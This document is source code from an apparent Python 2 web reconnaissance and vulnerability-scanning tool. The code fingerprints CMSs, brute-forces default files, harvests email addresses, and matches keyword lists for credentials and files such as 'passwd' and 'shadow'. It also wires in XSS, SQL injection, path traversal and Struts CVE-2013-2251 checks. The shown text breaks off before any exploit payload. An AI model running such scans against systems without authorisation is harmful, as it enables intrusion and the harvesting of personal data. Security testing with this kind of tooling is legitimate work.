122 | 		for tool in self.tools:
123 | 			tool.fromCode(rcode,direccion)
124 | 
125 | 	def fromFilename(self,filename):
126 | 		for tool in self.tools:
127 | 			tool.fromFilename(filename)
128 | 	
129 | 	# regresa una lista con los resultados de las herramientas externas
130 | 	# de cada modulo
131 | 	def runExtTools(self):
132 | 		extres = []
133 | 		for tool in self.tools:
134 | 			if tool.hasDetections():
135 | 				extr = tool.launchTool()
136 | 				if extr is not None:
137 | 					extres.append(extr)
138 | 		return extres
139 | 		
140 | 	# regresa la suma de la puntuacion de los modulos		
141 | 	def getPuntuation(self):
142 | 		score = 0
143 | 		for tool in self.tools:
144 | 			score+= tool.getPuntuation()
145 | 		return score
146 | 		
147 | 	def results(self):
148 | 		temp = []
149 | 		for tool in self.tools:
150 | 			if tool.hasDetections():
151 | 				#temp+='\n'+tool.getResults()
152 | 				#temp = [tool.name]+tool.getResults()
153 | 				temp.append([tool.name]+tool.getResults())
154 | 		return temp
155 | 	
156 | 	# postcrawling, aqui obtengo los directorios no comunes y consulto los archivos default
157 | 	# solo se hace para los modulos que tuvieron detecciones
158 | 	def postCrawling(self):
159 | 		for tool in self.tools:
160 | 			if tool.hasDetections():
161 | 				#print "postcrawling with -> "+tool.getName()
162 | 				"""
163 | 				Aqui debo guardar el resultado de la llamada al modulo postcrawling
164 | 				Esta llamada es dinamica, por lo que puede regresar:
165 | 					nombre, listaderecursos
166 | 					nombre, cmsroot
167 | 				"""
168 | 				tmpres = tool.postCrawling()
169 | 				detectorname = tmpres[0]
170 | 				resourceslst = tmpres[1]
171 | 				cmsroot = None
172 | 				if len(tmpres)>2:
173 | 					cmsroot =  tmpres[2]
174 | 				#print "\nEn SWController@Postcrawling\n%s\n%s" % (tmpres[0],tmpres[1])
175 | 				#print "len de tmpres",len(tmpres)
176 | 				if cmsroot is not None: print "cmsroot -> ",cmsroot
177 | 				self.vulncontroller.setResources(detectorname,resourceslst,cmsroot)
178 | 				
179 | 			
180 | 	# Regresa una lista con los resultados de las herramientas externas
181 | 	"""
182 | 	def externalResults(self):
183 | 		print '*'*70
184 | 		temp = []
185 | 		for tool in self.tools:
186 | 			# lista de cadenas
187 | 			tmp = tool.getExternalResults()
188 | 			if tmp is not None: temp.append(tmp)
189 | 		# lista de cadenas
190 | 		return temp
191 | 	"""
192 | 	
193 | 	def __str__(self):
194 | 		temp = ''
195 | 		for tool in self.tools: temp+='\n'+tool.name
196 | 		return 'Software detection modules'+temp+'\n'
197 | 


--------------------------------------------------------------------------------
/detection/swcontroller.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/detection/swcontroller.pyc


--------------------------------------------------------------------------------
/detection/swdetection.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | import requests
  3 | import subprocess
  4 | import re
  5 | from subprocess import check_output
  6 | from utils import parseurls
  7 | try:
  8 | 	from colorama import init, Fore,Back, Style
  9 | except:
 10 | 	pass
 11 | 
 12 | class detector(object):
 13 | 	def __init__(self,req=None,datadir=None,color=False):
 14 | 		try: init(convert=True,autoreset=True) # colorama
 15 | 		except: pass
 16 | 		self.color = False
 17 | 		# new
 18 | 		self.datadir = datadir
 19 | 		self.name = 'detector'
 20 | 		self.headers = []
 21 | 		self.filelist = []
 22 | 		self.wordpatterns = []
 23 | 		# Objeto para realizar las peticiones
 24 | 		self.req = req
 25 | 		# holder cms root
 26 | 		self.cmsroot = None
 27 | 		# flags to search in external tool output
 28 | 		self.toolflags = []
 29 | 		self.toolargs = []
 30 | 		self.toolpath = None
 31 | 		# Salida de la herramienta externa
 32 | 		self.output = None
 33 | 		
 34 | 		self.defaultdirs = []
 35 | 		self.defaultfiles = []
 36 | 		self.dicdefdirs = {}
 37 | 		self.detections = []
 38 | 		# Bandera para hacer postcrawl cada modulo hara su funcion especifica
 39 | 		self.postcrawl = False
 40 | 		# Puntuacion del detector
 41 | 		self.puntuation = 0	
 42 | 	
 43 | 	#working
 44 | 	def getName(self):
 45 | 		return self.name
 46 | 	
 47 | 	#working
 48 | 	def setToolPath(self,toolpath):
 49 | 		if toolpath is not None: self.toolpath = toolpath
 50 | 	
 51 | 	def setToolArgs(self,toolargs):
 52 | 		if toolargs is not None: self.toolargs = toolargs
 53 | 		
 54 | 	def setToolFlags(self,toolflags):
 55 | 		if toolflags is not None: self.toolflags = toolflags
 56 | 
 57 | 	def launchTool(self): 
 58 | 		#print "entre a launchtool "
 59 | 		if self.toolpath is not None:
 60 | 			#print "toolpath ",self.toolpath
 61 | 			# toolargs settings
 62 | 			try:
 63 | 				# cambio el placeholder por la url
 64 | 				if self.toolflags is not None:
 65 | 					print 'Tool flags -> ',self.toolflags
 66 | 				for i in range(0,len(self.toolargs)):
 67 | 					if self.toolargs[i] == '{url}': 
 68 | 						if self.cmsroot is not None:
 69 | 							self.toolargs[i] = self.cmsroot
 70 | 						else:
 71 | 							self.toolargs[i] = self.detections[0]
 72 | 				print 'Ejecutando herramienta externa:'
 73 | 				print ' '.join(self.toolargs)
 74 | 				print 'Wait external scan in progress'
 75 | 				ps = subprocess.Popen((self.toolargs), stdout=subprocess.PIPE)
 76 | 				output, err = ps.communicate()
 77 | 				self.output = output
 78 | 				# Aqui debo actualizar la puntuacion del detector
 79 | 				self.extToolScore()
 80 | 				return self.name+'tool\n'+output
 81 | 			except Exception as e:
 82 | 				print 'Error running -> ',self.toolpath,' -> ',e
 83 | 		else:
 84 | 			print 'No external tool defined for ',self.name
 85 | 	
 86 | 	def extToolScore(self):
 87 | 		for tflag in self.toolflags:
 88 | 			marker = tflag[0]
 89 | 			score = tflag[1]
 90 | 			count = self.output.count(marker)
 91 | 			self.puntuation+=count*score
 92 | 		print "*"*50,"Module Puntuation: %s "%(self.name),self.puntuation,"*"*50
 93 | 		
 94 | 	# Busca por la carga del header h:key busca key
 95 | 	def fromHeaders(self,rheaders,direccion):
 96 | 		rhead,rhkeys = rheaders,rheaders.keys()
 97 | 		for lheader in self.headers:
 98 | 			for rhkey in rhkeys:
 99 | 				if lheader in rhead[rhkey]:
100 | 					# aqui lo agrego a la lista
101 | 					if self.color:
102 | 						try:
103 | 							print (Fore.GREEN+'Sw found (Header detection) >>>>>>>> '+Fore.RED+self.name+Style.RESET_ALL)
104 | 						except:
105 | 							print 'Sw found (Header detection) >>>>>>>> ',self.name
106 | 					else:
107 | 						print 'Sw found (Header detection) >>>>>>>> ',self.name
108 | 					if direccion not in self.detections:
109 | 						self.detections.append(direccion)
110 | 						self.puntuation+=.1
111 | 					return True
112 | 		return False
113 | 	
114 | 	# Busca las cadenas (regexp) de wordpatterns en el codigo html
115 | 	def fromCode(self,rcode,direccion):
116 | 		for wp in self.wordpatterns:
117 | 			matches = re.findall(wp,rcode,re.IGNORECASE) 
118 | 			if len(matches) > 0:
119 | 				if self.color:
120 | 					try:
121 | 						print (Fore.GREEN+'Sw found (Code detection) >>>>>>>> '+Fore.RED+self.name+Style.RESET_ALL)
122 | 					except:
123 | 						print 'Sw found (Code detection) -> ',self.name
124 | 				else:
125 | 					print 'Sw found (Code detection) -> ',self.name
126 | 				# debug
127 | 				print matches
128 | 				for m in matches:
129 | 					if m not in self.detections:
130 | 						temp = direccion
131 | 						self.detections.append(temp)
132 | 						self.puntuation+=.1
133 | 				return True
134 | 		return False
135 | 	
136 | 	# Detecta mediante la url (nombre del archivo)
137 | 	def fromFilename(self,filename):
138 | 		for f in self.filelist:
139 | 			if f in filename:
140 | 				if filename not in self.detections:
141 | 					self.detections.append(filename)
142 | 					self.puntuation+=.1
143 | 				if self.color:
144 | 					try:
145 | 						print (Fore.GREEN+'Sw found (Path detection) -> '+Fore.RED+self.name+Style.RESET_ALL)
146 | 					except:	
147 | 						print 'Sw found (Path detection) -> ',self.name
148 | 				else:
149 | 					print 'Sw found (Path detection) -> ',self.name
150 | 				# debug
151 | 				print 'matched: {%s} ' % f
152 | 				return True
153 | 		return False
154 | 	
155 | 	def hasDetections(self):
156 | 		if len(self.detections) > 0:
157 | 			return True
158 | 		return False
159 | 	
160 | 	def getResults(self):
161 | 		if self.hasDetections():
162 | 			return self.detections
163 | 	
164 | 	# chanfle: cross calling
165 | 	def getResources(self):
166 | 		#print 'entre a Swdetection@getResources ',self.name
167 | 		try:
168 | 			if self.cmsroot is not None:
169 | 				#print 'cmsroot no es None',self.cmsroot
170 | 				#print 'cmsroot no es None',self.cmsroot	# da problemas si quito el self se soluciona
171 | 				return self.name,self.getResults(),self.cmsroot
172 | 			return self.name,self.getResults()
173 | 		except Exception as e:
174 | 			return self.name,self.getResults()
175 | 				
176 | 	# inicializa el diccionario con los directorios default del cms
177 | 	def initDicDefDirs(self):
178 | 		for defdir in self.defaultdirs:
179 | 			self.dicdefdirs[defdir] = 1
180 | 
181 | 	# returns not default cms directories
182 | 	def postCrawling(self):
183 | 		if self.postcrawl:
184 | 			#print 'entre a swdetect postcrawling ',self.name
185 | 			#print 'debug self.detections ',self.detections
186 | 			# Directorios encontrados
187 | 			dirs = parseurls.getDirectories(self.detections)
188 | 			print('\n%s found dirs: ' % self.name)
189 | 			print('\n'.join(dirs))
190 | 			################### DIRECTORIOS NO COMUNES #################
191 | 			uncommon = parseurls.uncommonDirectories(dirs,self.defaultdirs)
192 | 			if len(uncommon)>0:
193 | 				print('\n%s uncommon directories:' % self.name)
194 | 				print('\n'.join(uncommon))
195 | 				# Agrego esto a las detecciones
196 | 				self.detections+=['...']+['%s Uncommon Dirs: ' % self.name]+uncommon
197 | 			######### BUSQUEDA DE ARCHIVOS DE CMS EN LOS DIRS ##########
198 | 			#print "\n","*"*30," "+self.name+" bruteforcing ","*"*30
199 | 			if self.color:
200 | 				try: print(Fore.BLUE+'\n'+self.name+" bruteforcing "+Style.RESET_ALL)
201 | 				except: print '\n',self.name+" bruteforcing: "
202 | 			else:
203 | 				print '\n',self.name+" bruteforcing: "
204 | 			# inicializo el diccionario de directorios default
205 | 			self.initDicDefDirs()
206 | 			# obtengo la raiz del cms
207 | 			#print 'SWDETECTION@CMSROOT ',self.name
208 | 			#print 'dirs ',dirs
209 | 			cmsroot = parseurls.getCMSRoot(dirs,self.dicdefdirs)
210 | 			#print 'debug swdetction cmsroot ',cmsroot
211 | 			if cmsroot is not None:
212 | 				#print "CMSROOT ",cmsroot
213 | 				self.cmsroot = cmsroot
214 | 				files = self.defaultfiles
215 | 				filesfound = []
216 | 				# peticiones a los archivos del cms juicyfiles
217 | 				for f in files:
218 | 					scode = -1
219 | 					try:
220 | 						scode = self.req.getHTMLCode(cmsroot+f).status_code
221 | 					except Exception as e:
222 | 						print "Error getting %s " % (cmsroot+f)
223 | 					if scode == 200 or scode == 405:
224 | 						#print '*'*10,cmsroot+f,'*'*10
225 | 						print cmsroot+f
226 | 						self.puntuation+=1
227 | 						filesfound.append(cmsroot+f)
228 | 				if len(filesfound)>0:
229 | 					self.detections+=['...']+['Files found: ']+filesfound
230 | 				themesfound = []
231 | 				# peticiones a los archivos del cms juicyfiles
232 | 				for theme in self.themes:
233 | 					scode = -1
234 | 					try:
235 | 						scode = self.req.getHTMLCode(cmsroot+theme).status_code
236 | 					except Exception as e:
237 | 						print "Error getting %s " % (cmsroot+f)
238 | 					if scode == 200 or scode == 405:
239 | 						print cmsroot+theme
240 | 						#print '*'*10,cmsroot+theme,'*'*10
241 | 						self.puntuation+=1
242 | 						themesfound.append(cmsroot+theme)
243 | 				if len(filesfound)>0:
244 | 					self.detections+=['...']+['Themes found: ']+themesfound
245 | 		# aqui paso los recursos detectados por el modulo a los modulos de vulnerabilidades
246 | 		return self.getResources()
247 | 				
248 | 	# Regresa el resultado de la herramienta externa
249 | 	def getExternalResults(self):
250 | 		if self.output is not None:
251 | 			return self.name +'ExtTool'+'\n' + self.output
252 | 	
253 | 	#
254 | 	def getPuntuation(self):
255 | 		return self.puntuation
256 | 		
257 | 	def getName(self):
258 | 		return self.name
259 | 		
260 | 	#working
261 | 	def __str__(self):
262 | 		return 'Name: %s\nHeaders: %s\nFlist: %s\nWPat: %s\nTPath: %s\nToolArgs: %s'%(self.name,self.headers,self.filelist,self.wordpatterns,self.toolpath,self.toolargs)
263 | 	
264 | class genscan(detector):
265 | 	#def __init__(self,req,datadir,name,color=False):
266 | 	# self,req,color,datadir,name,filelist,dirs,juicyfiles,postCrawl
267 | 	def __init__(self,req,color,datadir,name,headers,wordpatterns,filelist,dirs,juicyfiles,themes,postcrawl):
268 | 		self.name = name
269 | 		self.req = req
270 | 		# new
271 | 		self.datadir = datadir
272 | 		self.color = color
273 | 		self.cmsroot = None
274 | 		self.headers = []
275 | 		self.wordpatterns = wordpatterns
276 | 		self.filelist = filelist
277 | 		self.defaultdirs = dirs
278 | 		self.defaultfiles = juicyfiles
279 | 		self.themes = themes
280 | 		self.postcrawl = postcrawl
281 | 		self.dicdefdirs = {}
282 | 		self.detections = []
283 | 		self.toolflags = []
284 | 		self.toolpath = None
285 | 		self.toolargs = []
286 | 		self.output = None
287 | 		# Puntuacion del detector
288 | 		self.puntuation = 0	
289 | 		
290 | class mailscan(detector):
291 | 	def __init__(self,req=None,color=False):
292 | 		self.name = 'mail'
293 | 		self.color = color
294 | 		self.req = req
295 | 		self.headers = []
296 | 		# regex mailto
297 | 		self.filelist = ['mailto:(.*)']
298 | 		# self.wordpatterns = [('[A-Za-z_\.0-9]+@[A-Za-z0-9]+\.[A-Za-z]+')]
299 | 		self.wordpatterns = [('[A-Za-z_\.0-9]+@[A-Za-z0-9]+\.[A-Za-z\.]+')]
300 | 		self.toolpath = None
301 | 		self.postcrawl = False
302 | 		self.detections = []
303 | 		self.toolargs = []
304 | 		self.output = None
305 | 		# Puntuacion del detector
306 | 		self.puntuation = 0	
307 | 		
308 | 	def fromFilename(self,filename):
309 | 		for f in self.filelist:
310 | 			matches = re.findall(f,filename,re.IGNORECASE) 
311 | 			if len(matches) > 0:
312 | 				for m in matches:
313 | 					if self.color:
314 | 						try:
315 | 							print (Fore.GREEN+"Mail found (Code detection) "+Fore.RED+m+Style.RESET_ALL)
316 | 						except:
317 | 							print 'Mail found (Code detection) -> ',m
318 | 					else:
319 | 						print 'Mail found (Code detection) -> ',m
320 | 					if m not in self.detections:
321 | 						self.detections.append(m)
322 | 						self.puntuation+=.1
323 | 				return True
324 | 		return False
325 | 
326 | 	# Busca las cadenas (regexp) de wordpatterns en el codigo html
327 | 	def fromCode(self,rcode,direccion):	
328 | 		for wp in self.wordpatterns:
329 | 			matches = re.findall(wp,rcode,re.IGNORECASE) 
330 | 			if len(matches) > 0:
331 | 				#for m in matches:
332 | 				for m in set(matches):
333 | 					if self.color:
334 | 						try:
335 | 							print (Fore.GREEN+"Mail found (Code detection) "+Fore.RED+m+Style.RESET_ALL)
336 | 						except:
337 | 							print 'Mail found (Code detection) -> ',m
338 | 					else:
339 | 						print 'Mail found (Code detection) -> ',m
340 | 					if m not in self.detections:
341 | 						#print m
342 | 						self.detections.append(m)
343 | 						self.puntuation+=.1
344 | 				return True
345 | 		return False
346 | 
347 | class contentscan(detector):
348 | 	def __init__(self,req=None,color=False):
349 | 		self.name = 'content'
350 | 		self.color = color
351 | 		self.req = req
352 | 		self.headers = []
353 | 		# regex mailto
354 | 		self.filelist = ['admin','admon','password','passwd','pwd',
355 | 			'login','logon','curp','rfc','cuenta','shadow','info','action']
356 | 		self.wordpatterns = ['(adm[io]n[A-Za-z0-9\t. ]{3,})',
357 | 		'((us(er[s]|r))[A-Za-z0-9\t. ]{5,})',
358 | 		'((passw(or)?d)[A-Za-z0-9\t. ]{5,})','(pwd[A-Za-z0-9\t. ]{5,})',
359 | 		'(log[io]n[A-Za-z0-9\t. ]{5,})','(curp[A-Za-z0-9\t. ]{5,})',
360 | 		'(rfc[A-Za-z0-9\t. ]{5,})','(cuenta[A-Za-z0-9\t. ]{5,})',
361 | 		'((usuario[s]?)[A-Za-z0-9\t. ]{5,})']
362 | 		self.toolpath = None
363 | 		self.postcrawl = False
364 | 		self.detections = []
365 | 		self.toolargs = []
366 | 		self.output = None
367 | 		# Puntuacion del detector
368 | 		self.puntuation = 0	
369 | 		
370 | 	def fromFilename(self,filename):
371 | 		for f in self.filelist:
372 | 			matches = re.findall(f,filename,re.IGNORECASE) 
373 | 			if len(matches) > 0:
374 | 				for m in matches:
375 | 					if self.color:
376 | 						try:
377 | 							print (Fore.GREEN+"Content found (Path detection) ->"+Fore.RED+m+Style.RESET_ALL)
378 | 						except:
379 | 							print 'Content found (Path detection) -> ',m
380 | 					else:
381 | 						print 'Content found (Path detection) -> ',m
382 | 					#print 'Content found (Path detection) -> ',m
383 | 					if m not in self.detections:
384 | 						self.detections.append(filename)
385 | 						self.puntuation+=1
386 | 				return True
387 | 		return False
388 | 		
389 | 	# Busca las cadenas (regexp) de wordpatterns en el codigo html
390 | 	def fromCode(self,rcode,direccion):	
391 | 		for wp in self.wordpatterns:
392 | 			matches = re.findall(wp,rcode,re.IGNORECASE) 
393 | 			if len(matches) > 0:
394 | 				#for m in matches:
395 | 				currentdetect = '%s -> %s' % (direccion,(matches))
396 | 				print currentdetect
397 | 				self.detections.append(currentdetect)
398 | 				self.puntuation+=1
399 | 				return True
400 | 		return False
401 | 
402 | class backupscan(detector):
403 | 	def __init__(self,req=None,color=False):
404 | 		self.name = 'backup'
405 | 		self.color = color
406 | 		self.req = req
407 | 		self.headers = []
408 | 		# regex mailto
409 | 		#self.filelist = [".bak",".back",".copia",".old",".res",".temp",
410 | 		#".tmp","respaldo",".anterior"]
411 | 		self.filelist = ["\.bak","\.back","\.copia","\.old","\.res","\.temp",
412 | 		"\.tmp","respaldo","\.anterior","respaldo"]
413 | 		self.wordpatterns = []
414 | 		self.toolpath = None
415 | 		self.postcrawl = False
416 | 		self.detections = []
417 | 		self.toolargs = []
418 | 		self.output = None
419 | 		# Puntuacion del detector
420 | 		self.puntuation = 0	
421 | 		
422 | 	def fromFilename(self,filename):
423 | 		for f in self.filelist:
424 | 			matches = re.findall(f,filename,re.IGNORECASE) 
425 | 			if len(matches) > 0:
426 | 				for m in matches:
427 | 					if self.color:
428 | 						try:
429 | 							print (Fore.GREEN+"Content found (Path detection) ->"+Fore.RED+m+Style.RESET_ALL)
430 | 						except:
431 | 							print 'Content found (Path detection) -> ',m
432 | 					else:
433 | 						print 'Content found (Path detection) -> ',m
434 | 					#print 'Content found (Path detection) -> ',m
435 | 					if m not in self.detections:
436 | 						self.detections.append(filename)
437 | 						self.puntuation+=1
438 | 				return True
439 | 		return False
440 | 		
441 | 	# Busca las cadenas (regexp) de wordpatterns en el codigo html
442 | 	def fromCode(self,rcode,direccion):	
443 | 		for wp in self.wordpatterns:
444 | 			matches = re.findall(wp,rcode,re.IGNORECASE) 
445 | 			if len(matches) > 0:
446 | 				#for m in matches:
447 | 				currentdetect = '%s -> %s' % (direccion,(matches))
448 | 				print currentdetect
449 | 				self.detections.append(currentdetect)
450 | 				self.puntuation+=1
451 | 				return True
452 | 		return False
453 | 
454 | class paramscanner(detector):
455 | 	def __init__(self,req=None,color=False):
456 | 		self.name = 'parameter scanner'
457 | 		self.color = color
458 | 		self.req = req
459 | 		self.headers = []
460 | 		# regex mailto
461 | 		self.filelist = []
462 | 		self.wordpatterns = []
463 | 		self.toolpath = None
464 | 		self.postcrawl = False
465 | 		self.detections = []
466 | 		self.toolargs = []
467 | 		self.params = {}
468 | 		self.output = None
469 | 		# Puntuacion del detector
470 | 		self.puntuation = 0	
471 | 		
472 | 	# Regresa si una url esta enviando parametros via GET
473 | 	def sendParams(self,url):
474 | 		if len(url.split('?')) > 1:
475 | 			return True
476 | 		return False
477 | 
478 | 	# Regresa una tupla (baseurl,params)
479 | 	# params es una lista de parametros; [p1=algo2,p2=algo2,p3=algo3]
480 | 	def getFields(self,url):
481 | 		fields = url.split('?')
482 | 		baseurl = fields[0]
483 | 		params = ''.join(fields[1:]).split('&')
484 | 		return (baseurl,params)
485 | 	
486 | 	# No me acuerdo que hace xD :/	
487 | 	def fillData(self,url):
488 | 		if self.sendParams(url) == True:
489 | 			data = self.getFields(url)
490 | 			baseurl = data[0]
491 | 			if baseurl not in self.params:
492 | 				self.params[baseurl] = []
493 | 			for p in data[1]:
494 | 				if p not in self.params[baseurl]:
495 | 					self.params[baseurl].append(p)
496 | 	
497 | 	def hasDetections(self):
498 | 		if len(self.params.keys()) > 0:
499 | 			return True
500 | 		return False
501 | 	
502 | 	# debe regresar una lista
503 | 	# [params, url:(p1,p2,...pn), url:(px1,px2...px3)]
504 | 	def getResults(self):
505 | 		llaves = self.params.keys()
506 | 		#tmp = [self.name]
507 | 		tmp = []
508 | 		for llave in llaves:
509 | 			tmp.append('\n'+llave+':\n\t'+'\n\t->['.join(sorted(self.params[llave]))+']')
510 | 		return tmp
511 | 		
512 | 	def fromFilename(self,filename):
513 | 		self.fillData(filename) 
514 | 		return False
515 | 
516 | 


--------------------------------------------------------------------------------
/detection/swdetection.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/detection/swdetection.pyc


--------------------------------------------------------------------------------
/detection/vulncontroller.py:
--------------------------------------------------------------------------------
 1 | #!/usr/bin/env python2
 2 | import requests
 3 | from vulndetection import *
 4 | from config.ConfigParser import *
 5 | from utils import parseurls
 6 | 
 7 | # Controlador para los detectores de vulnerabilidades
 8 | class vulncontroller:
 9 | 	#def __init__(self,configfile,detectors = None):
10 | 	# objeto para peticiones
11 | 	# TODO: include blacklist
12 | 	def __init__(self,configfile,blacklist,req,color=False,detectors = None):
13 | 		self.configfile = configfile
14 | 		self.blacklist = parseurls.getList(blacklist)
15 | 		"""
16 | 		print('vulncontroller: %s' % configfile)
17 | 		print('Cfgfile %s' % configfile)
18 | 		print('Blacklist %s' % blacklist)
19 | 		print('type blacklist %s' % type(blacklist))
20 | 		print('color %s' % color)
21 | 		print('len blacklist %s' % len(self.blacklist))
22 | 		"""
23 | 		self.req = req
24 | 		self.color = color
25 | 		self.configparser = ConfigParser(self.configfile)
26 | 		self.tools = []
27 | 		self.initTools()
28 | 	
29 | 	def setConfFile(self,configfile):
30 | 		if configfile is not None: self.configfile = configfile
31 | 	
32 | 	# define los modulos de deteccion a ocupar
33 | 	def initTools(self):
34 | 		print('en initTools')
35 | 		strutscanner =  strutscan(self.req,self.blacklist,self.color)
36 | 		drupalscanner =  drupalscan(self.req,self.blacklist,self.color)
37 | 		wordpresscanner = wordpresscan(self.req,self.blacklist,self.color)
38 | 		joomlascanner = joomlascan(self.req,self.blacklist,self.color)
39 | 		moodlescanner = moodlescan(self.req,self.blacklist,self.color)
40 | 		magentoscanner = magentoscan(self.req,self.blacklist,self.color)
41 | 		# nuevo modulo 
42 | 		xssscanner = xssscan(self.req,self.blacklist,self.color)
43 | 		sqliscanner = sqliscan(self.req,self.blacklist,self.color)
44 | 		path_tscan = path_traversal_scan(self.req,self.blacklist,self.color)
45 | 		self.tools = [strutscanner,drupalscanner,wordpresscanner,joomlascanner,
46 | 		moodlescanner,magentoscanner,xssscanner,sqliscanner,path_tscan]		
47 | 		
48 | 	def fromHeaders(self,rheaders,direccion):
49 | 		for tool in self.tools:
50 | 			tool.fromHeaders(rheaders,direccion)
51 | 
52 | 	def fromCode(self,rcode,direccion):
53 | 		for tool in self.tools:
54 | 			tool.fromCode(rcode,direccion)
55 | 
56 | 	def fromFilename(self,filename):
57 | 		for tool in self.tools:
58 | 			tool.fromFilename(filename)
59 | 	
60 | 	# regresa la suma de la puntuacion de los modulos		
61 | 	def getPuntuation(self):
62 | 		score = 0
63 | 		for tool in self.tools:
64 | 			score+= tool.getPuntuation()
65 | 		return score
66 | 		
67 | 	def results(self):
68 | 		temp = []
69 | 		for tool in self.tools:
70 | 			if tool.hasDetections():
71 | 				temp.append([tool.name]+tool.getResults())
72 | 		return temp
73 | 		
74 | 	# Recibe una tupla (nombredelmoduloquedetecto,listaderecursos,cmsroot posible nulo)
75 | 	def setResources(self,detectorname,resources,cmsroot=None):
76 | 		"""
77 | 		print '****'
78 | 		print 'entre a VulnController@setResources con\n%s\n%s\ncmsroot%s' % (detectorname,resources,cmsroot)
79 | 		print 'setting Resources'
80 | 		print 'we have %s vuln modules ' % (len(self.tools)),' ',self.tools
81 | 		print '****'
82 | 		"""
83 | 		for tool in self.tools:
84 | 			if detectorname == tool.getName():
85 | 				#print 'Setting resources to ',tool.getName()
86 | 				tool.setResources(resources,cmsroot)
87 | 				# una vez que le paso los recursos ejecuta los exploits
88 | 				tool.launchExploitsF()
89 | 		
90 | 	def __str__(self):
91 | 		temp = ''
92 | 		for tool in self.tools: temp+='\n'+tool.name
93 | 		return 'Detectors available'+temp+'\n'
94 | 


--------------------------------------------------------------------------------
/detection/vulncontroller.pyc:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/truerandom/crawleet/bbaf959920403474426a21f3269dd6a2fe5e09a1/detection/vulncontroller.pyc


--------------------------------------------------------------------------------
/detection/vulndetection.py:
--------------------------------------------------------------------------------
  1 | #!/usr/bin/env python2
  2 | import base64
  3 | import requests
  4 | import subprocess
  5 | import re
  6 | import cgi
  7 | from subprocess import check_output
  8 | from utils import parseurls
  9 | try: from colorama import init, Fore,Back, Style
 10 | except: pass
 11 | 
 12 | """
 13 | El objeto req tiene metodos para realizar peticiones http
 14 | Se encuentra definido en request/rutils
 15 | El metodo que verifica la vulnerabilidad es launchExploitsF 
 16 | cada modulo debe definir su comportamiento en este metodo
 17 | """
 18 | class vulndetector(object):
 19 | 	def __init__(self,req=None,blacklist=[],color=False):
 20 | 		try:
 21 | 			init(convert=True,autoreset=True) # colorama
 22 | 		except:
 23 | 			pass
 24 | 		self.blacklist = blacklist
 25 | 		self.color = False
 26 | 		self.name = 'vulndetector'
 27 | 		# Elementos para explotar
 28 | 		self.headers = []
 29 | 		self.filelist = []
 30 | 		self.wordpatterns = []
 31 | 		# holder cms root
 32 | 		self.cmsroot = None
 33 | 		# flags to search in external tool output
 34 | 		self.toolflags = []
 35 | 		# Objeto para realizar las peticiones
 36 | 		self.req = req
 37 | 		self.toolpath = None
 38 | 		self.defaultdirs = []
 39 | 		self.defaultfiles = []
 40 | 		self.dicdefdirs = {}
 41 | 		self.detections = []
 42 | 		self.toolargs = []
 43 | 		# elementos pasados como llamadas del modulo postcrawling
 44 | 		self.resources = []
 45 | 		# bandera para ejecucion individual (por cada recurso)
 46 | 		self.standalone = False
 47 | 		# Salida de la herramienta externa
 48 | 		#self.output = None
 49 | 		# Puntuacion del detector
 50 | 		self.puntuation = 0	
 51 | 		self.cmsroot = None
 52 | 	
 53 | 	#working
 54 | 	def getName(self): return self.name
 55 | 	
 56 | 	# Busca por la carga del header h:key busca key
 57 | 	def fromHeaders(self,rheaders,direccion):
 58 | 		print 'vulndetection@fromHeaders'
 59 | 		
 60 | 	# Busca las cadenas (regexp) de wordpatterns en el codigo html
 61 | 	def fromCode(self,rcode,direccion):
 62 | 		print 'vulndetection@fromCode'
 63 | 	
 64 | 	# Detecta mediante la url (nombre del archivo)
 65 | 	def fromFilename(self,filename):
 66 | 		#if self.standalone:
 67 | 		if self.standalone and parseurls.get_extension(filename) not in self.blacklist:
 68 | 			print 'Running exploit from filename module ',self.name
 69 | 			self.launchExploitFilename(filename)
 70 | 	
 71 | 	"""
 72 | 	El metodo que checa las vulnerabilidades se llama despues de que
 73 | 	se le asignan los recursos a este modulo en vulncontroller@setResources
 74 | 	"""
 75 | 	def launchExploitsF(self):
 76 | 		if len(self.resources) > 0:
 77 | 			for res in self.resources:
 78 | 				print 'res %s' % res
 79 | 		
 80 | 	def hasDetections(self):
 81 | 		if len(self.detections) > 0:
 82 | 			return True
 83 | 		return False
 84 | 	
 85 | 	def getResults(self):
 86 | 		if self.hasDetections():
 87 | 			return self.detections
 88 | 			
 89 | 	# Agrega recursos a analizar por los modulos de deteccion
 90 | 	def setResources(self,reslist,cmsroot=None):
 91 | 		#print 'Soy %s y recibi resources %s' % (self.name,reslist)
 92 | 		self.resources = reslist
 93 | 		if cmsroot is not None:
 94 | 			self.cmsroot = cmsroot
 95 | 		
 96 | 	def launchExploitFilename(self,filename):
 97 | 		print 'exploit template'
 98 | 		
 99 | 	"""
100 | 	def checkvulnerability(self,reqobj):
101 | 		print 'vuln check template'
102 | 	"""
103 | 	
104 | 	def getPuntuation(self):
105 | 		return self.puntuation
106 | 		
107 | 	#working
108 | 	def __str__(self):
109 | 		return "\nName %s\nStandalone %s" % (self.name,self.standalone)
110 | 
111 | 	
112 | # done
113 | class strutscan(vulndetector):
114 | 	def __init__(self,req,blacklist,color=False):
115 | 		self.name = 'struts'
116 | 		self.color = color
117 | 		self.blacklist = blacklist
118 | 		self.req = req
119 | 		self.cmsroot = None
120 | 		self.toolflags = []
121 | 		self.headers = []
122 | 		self.filelist = ['']
123 | 		self.wordpatterns = ['']
124 | 		self.defaultdirs = ['']
125 | 		self.defaultfiles = ['']
126 | 		self.dicdefdirs = {}
127 | 		self.standalone = True
128 | 		self.toolpath = None
129 | 		self.postcrawl = True
130 | 		self.detections = []
131 | 		self.resources = []
132 | 		self.toolargs = []
133 | 		self.output = None
134 | 		# Puntuacion de este scanner
135 | 		self.puntuation = 0	
136 | 		self.standalone = True
137 | 
138 | 	def launchExploitFilename(self,dirurl):
139 | 		if parseurls.get_extension(dirurl) not in self.blacklist:
140 | 			if self.launchExploitCVE_2013_2251(dirurl):
141 | 				cve = 'CVE2013-2251'
142 | 				print '*'*(len(cve)+15),'\nVulnerable to %s\n' % cve,'*'*(len(cve)+15)	
143 | 			#print "VULNERABLE TO CVE2013-2251: ",dirurl
144 | 		
145 | 	def launchExploitCVE_2013_2251(self,dirurl):
146 | 		cve = 'cve-2013-2251'
